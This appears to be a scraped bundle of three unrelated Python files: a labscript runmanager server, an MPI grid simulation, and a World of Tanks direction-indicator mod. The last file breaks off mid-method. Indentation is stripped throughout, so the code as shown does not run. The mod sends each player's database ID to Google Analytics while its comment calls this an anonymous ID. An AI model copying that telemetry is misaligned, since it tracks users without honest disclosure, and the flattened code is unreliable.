elif not isinstance(new_value, (str, bytes)):
msg = "global %s must be a string if raw=True, not %s"
raise TypeError(msg % (global_name, new_value.__class__.__name__))
# Find the group this global is in:
for group_name, group_globals in sequence_globals.items():
globals_file = active_groups[group_name]
if global_name in group_globals:
# Confirm it's not also in another group:
for other_name, other_globals in sequence_globals.items():
if other_globals is not group_globals:
if global_name in other_globals:
msg = """Cannot set global %s, it is defined in
multiple active groups: %s and %s"""
msg = msg % (global_name, group_name, other_name)
raise RuntimeError(dedent(msg))
previous_value, _, _ = sequence_globals[group_name][global_name]
# Append expression-final comments in the previous expression to
# the new one:
comments = runmanager.find_comments(previous_value)
if comments:
# Only the final comment
comment_start, comment_end = comments[-1]
# Only if the comment is the last thing in the expression:
if comment_end == len(previous_value):
new_value += previous_value[comment_start:comment_end]
try:
# Is the group open?
group_tab = app.currently_open_groups[
globals_file, group_name
]
except KeyError:
# Group is not open. Change the global value on disk:
runmanager.set_value(
globals_file, group_name, global_name, new_value
)
else:
# Group is open. Change the global value via the GUI:
group_tab.change_global_value(
global_name,
previous_value,
new_value,
interactive=False,
)
break
else:
# Global was not found.
msg = "Global %s not found in any active group" % global_name
raise ValueError(msg)
finally:
# Trigger preparsing of globals to occur so that changes in globals not in
# open tabs are reflected in the GUI, such as n_shots, errors on other
# globals that depend on them, etc.
app.globals_changed()
def handle_engage(self):
app.wait_until_preparse_complete()
inmain(app.on_engage_clicked)
@inmain_decorator()
def handle_abort(self):
app.on_abort_clicked()
@inmain_decorator()
def handle_get_run_shots(self):
return app.ui.checkBox_run_shots.isChecked()
@inmain_decorator()
def handle_set_run_shots(self, value):
app.ui.checkBox_run_shots.setChecked(value)
@inmain_decorator()
def handle_get_view_shots(self):
return app.ui.checkBox_view_shots.isChecked()
@inmain_decorator()
def handle_set_view_shots(self, value):
app.ui.checkBox_view_shots.setChecked(value)
@inmain_decorator()
def handle_get_shuffle(self):
return app.ui.pushButton_shuffle.isChecked()
@inmain_decorator()
def handle_set_shuffle(self, value):
app.ui.pushButton_shuffle.setChecked(value)
def handle_n_shots(self):
# Wait until any current preparsing is done, to ensure this is not racy w.r.t
# previous remote calls:
app.wait_until_preparse_complete()
return app.n_shots
@inmain_decorator()
def handle_get_labscript_file(self):
labscript_file = app.ui.lineEdit_labscript_file.text()
return os.path.abspath(labscript_file)
@inmain_decorator()
def handle_set_labscript_file(self, value):
labscript_file = os.path.abspath(value)
app.ui.lineEdit_labscript_file.setText(labscript_file)
@inmain_decorator()
def handle_get_shot_output_folder(self):
shot_output_folder = app.ui.lineEdit_shot_output_folder.text()
return os.path.abspath(shot_output_folder)
@inmain_decorator()
def handle_set_shot_output_folder(self, value):
shot_output_folder = os.path.abspath(value)
app.ui.lineEdit_shot_output_folder.setText(shot_output_folder)
def handle_error_in_globals(self):
try:
# This will raise an exception if there are multiple active groups of the
# same name:
active_groups = inmain(app.get_active_groups, interactive=False)
sequence_globals = runmanager.get_globals(active_groups)
# This will raise an exception if any of the globals can't be evaluated:
runmanager.evaluate_globals(sequence_globals, raise_exceptions=True)
except Exception:
return True
return False
def handle_is_output_folder_default(self):
return not app.non_default_folder
@inmain_decorator()
def handle_reset_shot_output_folder(self):
app.on_reset_shot_output_folder_clicked(None)
def handler(self, request_data):
cmd, args, kwargs = request_data
if cmd == 'hello':
return 'hello'
elif cmd == '__version__':
return runmanager.__version__
try:
return getattr(self, 'handle_' + cmd)(*args, **kwargs)
except Exception as e:
msg = traceback.format_exc()
msg = "Runmanager server returned an exception:\n" + msg
return e.__class__(msg)
if __name__ == "__main__":
logger = setup_logging('runmanager')
labscript_utils.excepthook.set_logger(logger)
logger.info('\n\n===============starting===============\n')
qapplication = QtWidgets.QApplication(sys.argv)
qapplication.setAttribute(QtCore.Qt.AA_DontShowIconsInMenus, False)
app = RunManager()
splash.update_text('Starting remote server')
remote_server = RemoteServer()
splash.hide()
qapplication.exec_()
remote_server.shutdown()
|
sim.py
|
# write to staging service
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import math
import numpy
from pyevtk.hl import imageToVTK
import os
import shutil
import copy
import random
import time
import ctypes
from mpi4py import MPI
import dataspaces.dataspaceClient as dataspaces
import sys
# insert pubsub and detect the things after every iteration
sys.path.append('../../../src/publishclient/pythonclient')
import pubsub as pubsubclient
import timeit
sys.path.append('../../../src/metadatamanagement/pythonclient')
import metaclient
from threading import Thread
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
# init dataspace client
# copy all conf.* file to current dir
serverdir = "/home1/zw241/dataspaces/tests/C"
confpath = serverdir+"/conf*"
copyCommand = "cp "+confpath+" ."
os.system(copyCommand)
# number of clients at clients end to join server
num_peers= 2
appid = 1
var_name = "ex1_sample_data"
#lock_name = "my_test_lock_"+str(rank)
lock_name = "my_test_lock"
ds = dataspaces.dataspaceClient(appid,comm)
pubsubaddrList = pubsubclient.getServerAddr()
print (pubsubaddrList)
pubsubAddr = pubsubaddrList[0]
#pubsubaddrList = pubsubclient.getServerAddr()
#print (pubsubaddrList)
#pubsubAddr = pubsubaddrList[0]
def putDataToDataSpaces(gridList,timestep):
cellDataArray=[]
for i in range (len(gridList)):
#print gridList[i].p
cellDataArray.append(gridList[i].p*1.0)
#ds.dspaces_lock_on_write(lock_name)
# elemsize = ctypes.sizeof(ctypes.c_double)
# data = ([[1.1,2.2,3.3],[4.4,5.5,6.6]])
# dataarray = (ver+1)*numpy.asarray(data)
ver = timestep
# data is 1 d array
if(rank==0):
lb = [0]
if (rank ==1):
lb = [3380]
#ds.lock_on_write(lock_name)
ds.put(var_name,ver,lb,cellDataArray)
#ds.unlock_on_write(lock_name)
#print("write to dataspaces for ts %d" % (timestep))
def sendEventToPubSub(pubsubAddr, ts):
eventList = ["variable_1"]
# this shoule be deleted
clientId = "test" + "_" + str(ts)
metainfo = "GRID[<0,0>:<1,1>]%TS["+str(ts)+"]"
matchtype= "META_GRID"
print("debug clientid %s metainfo %s matchtype %s"%(clientId,metainfo,matchtype))
pubsubclient.publishEventList(pubsubAddr,eventList,clientId,metainfo,matchtype)
print("pubsubclient %s ok"%(clientId))
#prifix = "./image"
#if os.path.isdir(prifix):
# shutil.rmtree(prifix)
#os.mkdir(prifix)
#define grid
class Grid:
def __init__(self, p, ux, uy, uz, lb, ub):
self.p = p
self.ux = ux
self.uy = uy
self.uz = uz
self.lb = lb
self.ub = ub
def __repr__(self):
return repr((self.p, self.ux, self.uy, self.uz, self.lb,self.ub))
r = 15
xlimit = r
ylimit = r
zlimit = r
gridnum=15
deltar=1.0*r/gridnum
massR = 4
lbx = -r*1.0
lby = -r*1.0
lbz = -r*1.0
ubx = r*1.0
uby = r*1.0
ubz = r*1.0
deltat=1
initux=0
inituy=0
inituz=1
constantVFiled = [initux,inituy,inituz]
initp = 1.5
#boundry p
boundp = initp*(-5)
class ColorMass:
massOrigin=[]
massR = massR
p = initp
ifFirstHappen = False
def checkAndPublishEvent(gridListNew,iteration):
ifTargetEventHappen = True
massOriginInterest = [6,0,6]
targetValue = 7.5
# put the analysis into the simulation part
for i in range (massOriginInterest[0],massOriginInterest[0]+massR):
for j in range (massOriginInterest[1],massOriginInterest[1]+massR):
for k in range (massOriginInterest[2],massOriginInterest[2]+massR):
#print "index i j k (%d %d %d)" % (i,j,k)
#print nparray[i][j][k]
#print "index i j k (%d %d %d)" % (i,j,k)
#print nparray[i][j][k]
index = getIndex(i,j,k)
if (gridListNew[index].p!=targetValue):
ifTargetEventHappen = False
break
if (ifTargetEventHappen == True):
print (iteration)
# send publish event
event = "CUBIC_DETECTED"
meta = str(iteration)
detecttime = timeit.default_timer()
print (detecttime)
pubsubclient.initAddrAndPublish(event,meta)
ifFirstHappen = True
return
# detect if the point is in mass
def inMassBody(px,py,pz,massOrigin,t,currIndex):
upbdx = massOrigin[0]+deltar*massR
upbdy = massOrigin[1]+deltar*massR
upbdz = massOrigin[2]+deltar*massR
#if (t>=5 and t <= 7 and currIndex%100 ==11):
# print "inMassBody"
# print [px,py,pz]
# print massOrigin
# print [upbdx,upbdy,upbdz]
if (px >= massOrigin[0] and px <= upbdx and py >=massOrigin[1] and py <= upbdy and pz >=massOrigin[2] and pz <= upbdz):
return True
else:
return False
def ifOutBoundForNextStep(massOrigin,t,currIndex):
# caculate the position for next step
nextx = massOrigin[0]+deltat*constantVFiled[0]
nexty = massOrigin[1]+deltat*constantVFiled[1]
nextz = massOrigin[2]+deltat*constantVFiled[2]
bxlpx=0
bxlby=0
bxlbz=0
# check eight point
bxupx=r
bxupy=r
bxupz=r
# adjust if eight point is at outside of the boundry
if nextx<bxlpx or nextx>bxupx or nexty<bxlby or nexty>bxupy or nextz<bxlbz or nextz>bxupz:
return True
checkx=nextx+massR*deltar
checky=nexty
checkz=nextz
if checkx<bxlpx or checkx>bxupx or checky<bxlby or checky>bxupy or checkz<bxlbz or checkz>bxupz:
return True
checkx=nextx
checky=nexty+massR*deltar
checkz=nextz
if checkx<bxlpx or checkx>bxupx or checky<bxlby or checky>bxupy or checkz<bxlbz or checkz>bxupz:
return True
checkx=nextx
checky=nexty
checkz=nextz+massR*deltar
if checkx<bxlpx or checkx>bxupx or checky<bxlby or checky>bxupy or checkz<bxlbz or checkz>bxupz:
return True
checkx=nextx
checky=nexty+massR*deltar
checkz=nextz+massR*deltar
if checkx<bxlpx or checkx>bxupx or checky<bxlby or checky>bxupy or checkz<bxlbz or checkz>bxupz:
return True
checkx=nextx+massR*deltar
checky=nexty
checkz=nextz+massR*deltar
if checkx<bxlpx or checkx>bxupx or checky<bxlby or checky>bxupy or checkz<bxlbz or checkz>bxupz:
return True
checkx=nextx+massR*deltar
checky=nexty+massR*deltar
checkz=nextz
if checkx<bxlpx or checkx>bxupx or checky<bxlby or checky>bxupy or checkz<bxlbz or checkz>bxupz:
return True
checkx=nextx+massR*deltar
checky=nexty+massR*deltar
checkz=nextz+massR*deltar
if checkx<bxlpx or checkx>bxupx or checky<bxlby or checky>bxupy or checkz<bxlbz or checkz>bxupz:
return True
return False
def boundryDetect(gridListObj):
# detect collision
# update the velocity
# collision x direaction 1
# collision y direaction 2
# collision z direaction 3
collisionFace = []
pcpx = gridListObj.lb[0] + deltar/2
pcpy = gridListObj.lb[1] + deltar/2
pcpz = gridListObj.lb[2] + deltar/2
cux =gridListObj.ux
cuy =gridListObj.uy
cuz =gridListObj.uz
newx = pcpx+cux*deltat
newy = pcpy+cuy*deltat
newz = pcpz+cuz*deltat
if (newx > gridnum*deltar) or (newx < 0):
collisionFace.append(1)
if (newy > gridnum*deltar) or (newy < 0):
collisionFace.append(2)
if (newz > gridnum*deltar) or (newz < 0):
collisionFace.append(3)
return collisionFace
# the effect of the collision have been added
def updateGridValue(gridListOld,gridListNew,currIndex,t,redmassOrigin,bluemassOrigin):
rmassLb = [redmassOrigin[0]-massR/2.0,redmassOrigin[1]-massR/2.0,redmassOrigin[2]-massR/2.0]
bmassLb = [bluemassOrigin[0]-massR/2.0,bluemassOrigin[1]-massR/2.0,bluemassOrigin[2]-massR/2.0]
zgridindex = int(gridListNew[currIndex].lb[2])
ygridindex = int(gridListNew[currIndex].lb[1])
xgridindex = int(gridListNew[currIndex].lb[0])
# get curr u (velocity)
#cux = gridListNew[currIndex].ux
#cuy = gridListNew[currIndex].uy
#cuz = gridListNew[currIndex].uz
cux = constantVFiled[0]
cuy = constantVFiled[1]
cuz = constantVFiled[2]
# get curr p
pcpx = gridListNew[currIndex].lb[0] + deltar/2
pcpy = gridListNew[currIndex].lb[1] + deltar/2
pcpz = gridListNew[currIndex].lb[2] + deltar/2
# get old value position
oldx = pcpx - deltat*cux
oldy = pcpy - deltat*cuy
oldz = pcpz - deltat*cuz
oldpIndex = getIndex(oldx,oldy,oldz)
newpIndex = getIndex(pcpx,pcpy,pcpz)
# in flow for one time step
# oldx oldy oldz at the outside p = 0
# clamping case, the p value shoule be 0
if oldpIndex == -1:
gridListNew[newpIndex].p = initp
return
#if body is outof box
#when the point is in body
#do not update
redifout = ifOutBoundForNextStep(rmassLb,t,currIndex)
blueifout = ifOutBoundForNextStep(bmassLb,t,currIndex)
#if (t>=4 and t <= 6 and currIndex%100 ==11):
# print t
# print massLb
# print ifout
if (redifout == True or blueifout == True) and gridListNew[currIndex].p != initp:
rifinBody = inMassBody(pcpx,pcpy,pcpz,rmassLb,t,currIndex)
bifinBody = inMassBody(pcpx,pcpy,pcpz,bmassLb,t,currIndex)
#if (t>=4 and t <= 7 and currIndex%100 ==11):
# print "ifinBody currIndex"
# print [ifinBody,currIndex]
if rifinBody==True or bifinBody==True:
#do not move if the condition is true
return
else:
gridListNew[newpIndex].p = gridListOld[oldpIndex].p
else:
gridListNew[newpIndex].p = gridListOld[oldpIndex].p
"""
# if on boundry
for dis in range (massR):
if (zgridindex==(gridnum-1-dis)):
# not move
# if current if updated value
# do not update
# if next 2 level is boundry do not update
disIndex = currIndex+dis*gridnum*gridnum
# TODO adjust if collision
if gridListNew[disIndex].p != initp:
print "t %d curr index%d" % (t,currIndex)
print [xgridindex,ygridindex,zgridindex]
return
"""
#if (t>=5 and t <= 9 and currIndex==912):
# print "after updating"
# print [gridListNew[newpIndex].p,gridListOld[oldpIndex].p]
def generateImage(gridList,filename):
cellData=[]
for i in range (len(gridList)):
#print gridList[i].p
cellData.append(gridList[i].p)
pressure=numpy.asarray(cellData).reshape(gridnum, gridnum, gridnum,order='F')
#print pressure
imageToVTK(filename, cellData = {"pressure" : pressure})
# input the coordinate of the points and return the index of grid in array
def getIndex(px,py,pz):
# TODO should add all boundry case
# only for lower case
if (px<0 or py <0 or pz<0 or px > gridnum*deltar or py > gridnum*deltar or pz > gridnum*deltar):
#print "out of the box "
#print [px,py,pz]
return -1
gnumx=math.floor((px-0)/deltar)
gnumy=math.floor((py-0)/deltar)
gnumz=math.floor((pz-0)/deltar)
index = int(gnumz*gridnum*gridnum + gnumy*gridnum+gnumx)
return index
gridList=[]
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
# init color mass
redmass = ColorMass()
redmass.massOrigin=[1+redmass.massR/2,1+redmass.massR/2,1+redmass.massR/2]
redmass.p = initp*(5)
bluemass = ColorMass()
bluemass.massOrigin = [8+bluemass.massR/2,1+bluemass.massR/2,1+bluemass.massR/2]
bluemass.p = initp*(-5)
# generate array of grid and init lb and ub
for zi in range (gridnum):
gridlbz = zi*deltar
for yi in range (gridnum):
gridlby = yi*deltar
for xi in range (gridnum):
gridlbx=xi*deltar
gridobj = Grid(initp,constantVFiled[0],constantVFiled[1],constantVFiled[2],[gridlbx,gridlby,gridlbz],[gridlbx+deltar,gridlby+deltar,gridlbz+deltar])
gridList.append(gridobj)
#plt.plot(gridlbx,gridlby,gridlbz,'k.')
ax.scatter(gridlbx, gridlby, gridlbz, color='k',marker='.')
# show grid data
plt.axis('scaled')
#plt.show()
# init the value at the grid center
for i in range (len(gridList)):
# add boundry condition
#zindex = i / (gridnum*gridnum)
#yindex = (i % (gridnum*gridnum))/gridnum
#xindex = (i % (gridnum*gridnum) % gridnum)
zindex = gridList[i].lb[2]
yindex = gridList[i].lb[1]
xindex = gridList[i].lb[0]
if xindex==0 or xindex ==(gridnum-1) or yindex==0 or yindex==(gridnum-1) or zindex==0 or zindex==(gridnum-1):
# boundry condition for p value and v value
#gridList[i].p=boundp
gridList[i].p=initp
#if (xindex==0 or xindex ==(gridnum-1)):
#gridList[i].ux = 0
# print "x boundry"
#if (yindex==0 or yindex==(gridnum-1)):
#gridList[i].uy = 0
# print "y boundry"
#if (zindex==0 or zindex==(gridnum-1)):
#gridList[i].uz = inituz / 2.0
#gridList[i].ux = 1
# print "z boundry"
# init condition
# generate init color mass
rmassLb = [redmass.massOrigin[0]-massR/2.0,redmass.massOrigin[1]-massR/2.0,redmass.massOrigin[2]-massR/2.0]
rmassUb = [redmass.massOrigin[0]+massR/2.0,redmass.massOrigin[1]+massR/2.0,redmass.massOrigin[2]+massR/2.0]
if (xindex >= rmassLb[0] and xindex <= rmassUb[0]-deltar and yindex>=rmassLb[1] and yindex<=rmassUb[1]-deltar and zindex>=rmassLb[2] and zindex<=rmassUb[2]-deltar) :
# update p value
gridList[i].p=redmass.p
# update velocity
gridList[i].ux = constantVFiled[0]
gridList[i].uy = constantVFiled[1]
gridList[i].uz = constantVFiled[2]
bmassLb = [bluemass.massOrigin[0]-massR/2.0,bluemass.massOrigin[1]-massR/2.0,bluemass.massOrigin[2]-massR/2.0]
bmassUb = [bluemass.massOrigin[0]+massR/2.0,bluemass.massOrigin[1]+massR/2.0,bluemass.massOrigin[2]+massR/2.0]
'''
if (xindex >= bmassLb[0] and xindex <= bmassUb[0]-deltar and yindex>=bmassLb[1] and yindex<=bmassUb[1]-deltar and zindex>=bmassLb[2] and zindex<=bmassUb[2]-deltar) :
# update p value
gridList[i].p=bluemass.p
# update velocity
gridList[i].ux = constantVFiled[0]
gridList[i].uy = constantVFiled[1]
gridList[i].uz = constantVFiled[2]
'''
#print "debug"
#print [xindex,yindex,zindex]
#if (i >=6 and i < 8) :
# gridList[i].p=initp*(-2)
# update the p in grid array
# ten timesteps
gridListNew = gridList
# trace the position of the mass origin
massOriginNew = redmass.massOrigin
def updateGridValueFake(gridListInput,ifcenter):
if(ifcenter==True):
# update center other parts is init value
massOriginInterest=[7,7,7]
else:
# update left, center part is red
# update center other parts is init value
massOriginInterest=[2,2,2]
rmassLb = [massOriginInterest[0]-massR/2.0,massOriginInterest[1]-massR/2.0,massOriginInterest[2]-massR/2.0]
for i in range (len(gridList)):
zindex = gridList[i].lb[2]
yindex = gridList[i].lb[1]
xindex = gridList[i].lb[0]
gridList[i].p = initp*(-5)
if (xindex >= rmassLb[0] and xindex <= rmassLb[0]+massR and yindex>=rmassLb[1] and yindex<=rmassLb[1]+massR and zindex>=rmassLb[2] and zindex<=rmassLb[2]+massR) :
# update p value
gridList[i].p=redmass.p
# simulate the time to caculate the data
time.sleep(0.1)
if (len(sys.argv)!=3):
print("simulation <iteration> <when interesting thing happen>")
exit(0)
iteration = int(sys.argv[1])
changeVPeriod = int(sys.argv[2])
vsign = 1
startsim = timeit.default_timer()
def threadFunction():
# check the meta periodically
addrList =metaclient.getServerAddr()
addr = addrList[0]
# if the value is not NULL
while(1):
value=metaclient.getMeta(addr, "meaningless")
if(value=="NULL"):
time.sleep(0.1)
continue
else:
break
endsim = timeit.default_timer()
print("data is becoming meaningless, time span")
print (endsim-startsim)
metaclient.putMeta(addr, "simend", "simendInfo")
os._exit(0)
thread = Thread(target = threadFunction)
thread.start()
print("start the thread watching the metaserver")
# send record to clock service
addrList=metaclient.getServerAddr()
addr = addrList[0]
metaclient.Recordtime(addr, "SIM")
for t in range (iteration):
moveToCenter = False
if (t>=changeVPeriod and t%changeVPeriod==0):
moveToCenter = True
updateGridValueFake(gridList,moveToCenter)
putDataToDataSpaces(gridListNew,t)
ds.finalize()
MPI.Finalize()
endsim = timeit.default_timer()
print("time span")
print (endsim-startsim)
|
mod_dir_indicator_extended115.py
|
# -*- coding: utf-8 -*-
import datetime
import re
import os
import json
import codecs
import urllib2
import urllib
import threading
from tutorial.control.battle.functional import IDirectionIndicator
from Avatar import PlayerAvatar
from constants import AUTH_REALM
import BigWorld
from gui.Scaleform.daapi.view.lobby.hangar.Hangar import Hangar
from gui.battle_control import g_sessionProvider
from gui import DEPTH_OF_Aim
from gui.Scaleform.Flash import Flash
from gui.Scaleform.Battle import Battle
# noinspection PyUnresolvedReferences
from Math import Vector3, Matrix
class Config(object):
def __init__(self):
self.enable = True
self.debug = False
self.ru = True if 'RU' in AUTH_REALM else False
self.version = 'v1.15(18.11.2015)'
self.author = 'by spoter, Thx to Lp()rtii'
self.description = 'dir_indicator_extended'
self.description_ru = 'Мод: "Тылы"'
self.author_ru = 'автор: spoter, спасибо! Lp()rtii'
self.name = 'dir_indicator_extended'
self.description_analytics = 'Мод: "Тылы"'
self.tid = 'UA-57975916-14'
self.setup = {'MODIFIER': {'MODIFIER_NONE': 0, 'MODIFIER_SHIFT': 1, 'MODIFIER_CTRL': 2, 'MODIFIER_ALT': 4}}
self.sys_mes = {}
self._thread_analytics = None
self.analytics_started = False
self.language = None
self.xvm_installed = False
self.xvm_check()
self.res_mods = self.res_mods_init()
self.data = {}
self.default_config()
new_config = self.load_json(self.name, self.data)
self.data = new_config
if 'Русский' in self.data['config'].get('language'): self.ru = True
if self.ru:
self.description = self.description_ru
self.author = self.author_ru
@staticmethod
def res_mods_init():
wd = os.path.dirname(os.path.realpath(__file__))
wd = wd[0:wd.rfind('\\')]
wd = wd[0:wd.rfind('\\')]
wd = wd[0:wd.rfind('\\')]
return wd
def xvm_check(self):
try:
#
import xvm_main
self.xvm_installed = True
except StandardError:
pass
def default_config(self):
self.data = {
'config': {
'enable': True, 'debug': False, 'primary_indication': True, 'secondary_indication': True, 'max_distance_primary_indication': 150, 'max_distance_secondary_indication': 707,
'strategic_fear_mode': False, 'red_to_purple_indication': True, 'distance_indicator': True, 'tank_name_indicator': True, 'language': 'Русский'
}, 'language': {'Русский': {}, 'English': {}}
}
def do_config(self):
self.enable = self.data['config'].get('enable', False)
self.debug = self.data['config'].get('debug', False)
if self.data['config'].get('language') in self.data['language']:
self.language = self.data['language'].get(self.data['config'].get('language'))
else:
self.data['config']['language'] = 'English'
self.language = self.data['language'].get('English')
def byte_ify(self, inputs):
if inputs:
if isinstance(inputs, dict):
return {self.byte_ify(key): self.byte_ify(value) for key, value in inputs.iteritems()}
elif isinstance(inputs, list):
return [self.byte_ify(element) for element in inputs]
elif isinstance(inputs, unicode):
return inputs.encode('utf-8')
else:
return inputs
return inputs
@staticmethod
def json_comments(text):
regex = r'\s*(#|\/{2}).*$'
regex_inline = r'(:?(?:\s)*([A-Za-z\d\.{}]*)|((?<=\").*\"),?)(?:\s)*(((#|(\/{2})).*)|)$'
lines = text.split('\n')
excluded = []
for index, line in enumerate(lines):
if re.search(regex, line):
if re.search(r'^' + regex, line, re.IGNORECASE):
excluded.append(lines[index])
elif re.search(regex_inline, line):
lines[index] = re.sub(regex_inline, r'\1', line)
for line in excluded:
lines.remove(line)
return '\n'.join(lines)
def load_json(self, name, config_old, save=False):
config_new = config_old
path = './res_mods/configs/spoter_mods/%s/' % self.name
if not os.path.exists(path):
os.makedirs(path)
new_path = '%s%s.json' % (path, name)
if save:
with codecs.open(new_path, 'w', encoding='utf-8-sig') as json_file:
data = json.dumps(config_old, sort_keys=True, indent=4, ensure_ascii=False, encoding='utf-8-sig', separators=(',', ': '))
json_file.write('%s' % self.byte_ify(data))
json_file.close()
config_new = config_old
else:
if os.path.isfile(new_path):
try:
with codecs.open(new_path, 'r', encoding='utf-8-sig') as json_file:
data = self.json_comments(json_file.read().decode('utf-8-sig'))
config_new = self.byte_ify(json.loads(data))
json_file.close()
except Exception as e:
self.sys_mess()
print '%s%s' % (self.sys_mes['ERROR'], e)
else:
self.sys_mess()
print '%s[%s, %s %s]' % (self.sys_mes['ERROR'], self.code_pa(self.description), self.version, self.sys_mes['MSG_RECREATE_CONFIG'])
with codecs.open(new_path, 'w', encoding='utf-8-sig') as json_file:
data = json.dumps(config_old, sort_keys=True, indent=4, ensure_ascii=False, encoding='utf-8-sig', separators=(',', ': '))
json_file.write('%s' % self.byte_ify(data))
json_file.close()
config_new = config_old
print '%s[%s, %s %s]' % (self.sys_mes['INFO'], self.code_pa(self.description), self.version, self.sys_mes['MSG_RECREATE_CONFIG_DONE'])
return config_new
@staticmethod
def code_pa(text):
try:
return text.encode('windows-1251')
except StandardError:
return text
def debugs(self, text):
if self.debug:
try:
text = text.encode('windows-1251')
except StandardError:
pass
print '%s%s [%s]: %s' % (datetime.datetime.now(), self.sys_mes['DEBUG'], self.code_pa(self.description), text)
def analytics_do(self):
if not self.analytics_started:
player = BigWorld.player()
param = urllib.urlencode({
'v': 1, # Version.
'tid': '%s' % self.tid, # Tracking ID / Property ID.
'cid': player.databaseID, # Anonymous Client ID.
't': 'screenview', # Screenview hit type.
'an': '%s' % self.description_analytics, # App name.
'av': '%s %s' % (self.description_analytics, self.version), # App version.
'cd': 'start [%s]' % AUTH_REALM # Screen name / content description.
})
self.debugs('http://www.google-analytics.com/collect?%s' % param)
urllib2.urlopen(url='http://www.google-analytics.com/collect?', data=param).read()
self.analytics_started = True
def analytics(self):
self._thread_analytics = threading.Thread(target=self.analytics_do, name='Thread')
self._thread_analytics.start()
def sys_mess(self):
self.sys_mes = {
'DEBUG': '[DEBUG]', 'LOAD_MOD': self.code_pa('[ЗАГРУЗКА]: ') if self.ru else '[LOAD_MOD]: ', 'INFO': self.code_pa('[ИНФО]: ') if self.ru else '[INFO]: ',
'ERROR': self.code_pa('[ОШИБКА]: ') if self.ru else '[ERROR]: ',
'MSG_RECREATE_CONFIG': self.code_pa('конфиг не найден, создаем заново') if self.ru else 'Config not found, recreating',
'MSG_RECREATE_CONFIG_DONE': self.code_pa('конфиг создан УСПЕШНО') if self.ru else 'Config recreating DONE',
'MSG_INIT': self.code_pa('применение настроек...') if self.ru else 'initialized ...', 'MSG_LANGUAGE_SET': self.code_pa('Выбран язык:') if self.ru else 'Language set to:',
'MSG_DISABLED': self.code_pa('отключен ...') if self.ru else 'disabled ...'
}
def load_mod(self):
self.do_config()
self.sys_mess()
print ''
print '%s[%s, %s]' % (self.sys_mes['LOAD_MOD'], self.code_pa(self.description), self.code_pa(self.author))
if self.enable:
self.debugs('Debug Activated ...')
print '%s[%s %s %s...]' % (self.sys_mes['INFO'], self.code_pa(self.description), self.sys_mes['MSG_LANGUAGE_SET'], self.code_pa(self.data['config'].get('language')))
print '%s[%s, %s %s]' % (self.sys_mes['INFO'], self.code_pa(self.description), self.version, self.sys_mes['MSG_INIT'])
else:
print '%s[%s, %s %s]' % (self.sys_mes['INFO'], self.code_pa(self.description), self.version, self.sys_mes['MSG_DISABLED'])
print ''
class CustomFlash(Flash, IDirectionIndicator):
__SWF_FILE_NAME = 'dir_indicator_extended.swf'
__FLASH_CLASS = 'WGDirectionIndicatorFlash'
__FLASH_MC_NAME = 'directionalIndicatorMc'
__FLASH_SIZE = (680, 680)
def __init__(self):
Flash.__init__(self, self.__SWF_FILE_NAME, self.__FLASH_CLASS, [self.__FLASH_MC_NAME]) #, self.__FLASH_PATH)
self.component.wg_inputKeyMode = 2
self.component.position.z = DEPTH_OF_Aim
self.movie.backgroundAlpha = 0.0
self.movie.scaleMode = 'NoScale'
self.component.focus = False
self.component.moveFocus = False
self.component.heightMode = 'PIXEL'
self.component.widthMode = 'PIXEL'
self.flashSize = self.__FLASH_SIZE
self.component.relativeRadius = 0.5
self.__dObject = getattr(self.movie, self.__FLASH_MC_NAME, None)
return
def set_shape(self, shape):
if self.__dObject:
self.__dObject.setShape(shape)
def set_distance(self, distance):
if self.__dObject:
self.__dObject.setDistance(distance)
def set_vehicle_name(self, vehicle_name):
if self.__dObject:
self.__dObject.setVName(vehicle_name)
def track(self, position):
if not self.component.visible:
self.active(True)
self.component.visible = True
self.component.position3D = position
def stop(self):
if self.component.visible:
self.active(False)
self.component.visible = False
class DirIndication(object):
def __init__(self):
self.primary_indication = config.data['config'].get('primary_indication')
self.secondary_indication = config.data['config'].get('secondary_indication')
self.max_distance_primary_indication = config.data['config'].get('max_distance_primary_indication', 0)
self.max_distance_secondary_indication = config.data['config'].get('max_distance_secondary_indication', 0)
self.strategic_fear_mode = config.data['config'].get('strategic_fear_mode')
self.red_to_purple_indication = config.data['config'].get('red_to_purple_indication')
self.distance_indicator = config.data['config'].get('distance_indicator')
self.tank_name_indicator = config.data['config'].get('tank_name_indicator')
self.enemies_list = {}
self.callback = None
def clear_vars(self):
for i in self.enemies_list.keys():
self.del_indicator(i)
self.enemies_list.clear()
self.callback = None
def start_battle(self):
if config.enable:
BigWorld.player().arena.onVehicleKilled += self.on_vehicle_killed
self.clear_vars()
self.callback = BigWorld.callback(0.5, self.refresh_indicator)
def stop_battle(self):
if config.enable:
BigWorld.player().arena.onVehicleKilled -= self.on_vehicle_killed
if self.callback:
BigWorld.cancelCallback(self.callback)
self.callback = None
self.clear_vars()
def init_vehicle(self, vehicle_id):
if self.get_is_live(vehicle_id):
self.check_visible(vehicle_id)
if not self.get_is_friendly(vehicle_id) and vehicle_id not in self.enemies_list:
self.enemies_list[vehicle_id] = {}
self.enemies_list[vehicle_id]['dir_indicator'] = CustomFlash()
self.enemies_list[vehicle_id]['distance'] = 10000
def fin_vehicle(self, vehicle_id):
if vehicle_id in self.enemies_list:
self.disable_indicator(vehicle_id)
@staticmethod
def add_observed_point(vehicle_id):
vehicle = BigWorld.player().arena.vehicles[vehicle_id]
try:
if 'vehicleType' in vehicle:
vehicle_type = vehicle['vehicleType']
if not hasattr(vehicle_type, 'observer_pos_on_chassis'):
hull_pos = vehicle_type.chassis['hullPosition']
hull_bbox_min, hull_bbox_max, _ = vehicle_type.hull['hitTester'].bbox
turret_pos_on_hull = vehicle_type.hull['turretPositions'][0]
turret_local_top_y = max(hull_bbox_max.y, turret_pos_on_hull.y + vehicle_type.turret['hitTester'].bbox[1].y)
vehicle_type.observer_pos_on_chassis = Vector3(0, hull_pos.y + turret_local_top_y, 0)
return True
return False
except StandardError:
return False
def enable_indicator(self, vehicle_id, checkpoint):
if vehicle_id in self.enemies_list:
if 'dir_indicator' in self.enemies_list[vehicle_id]:
self.enemies_list[vehicle_id]['dir_indicator'].track(checkpoint)
if self.distance_indicator:
self.enemies_list[vehicle_id]['dir_indicator'].set_distance(self.enemies_list[vehicle_id]['distance'])
if self.tank_name_indicator:
target_info = g_sessionProvider.getCtx().getFullPlayerNameWithParts(vehicle_id)
if target_info and target_info[4]:
self.enemies_list[vehicle_id]['dir_indicator'].set_vehicle_name(target_info[4])
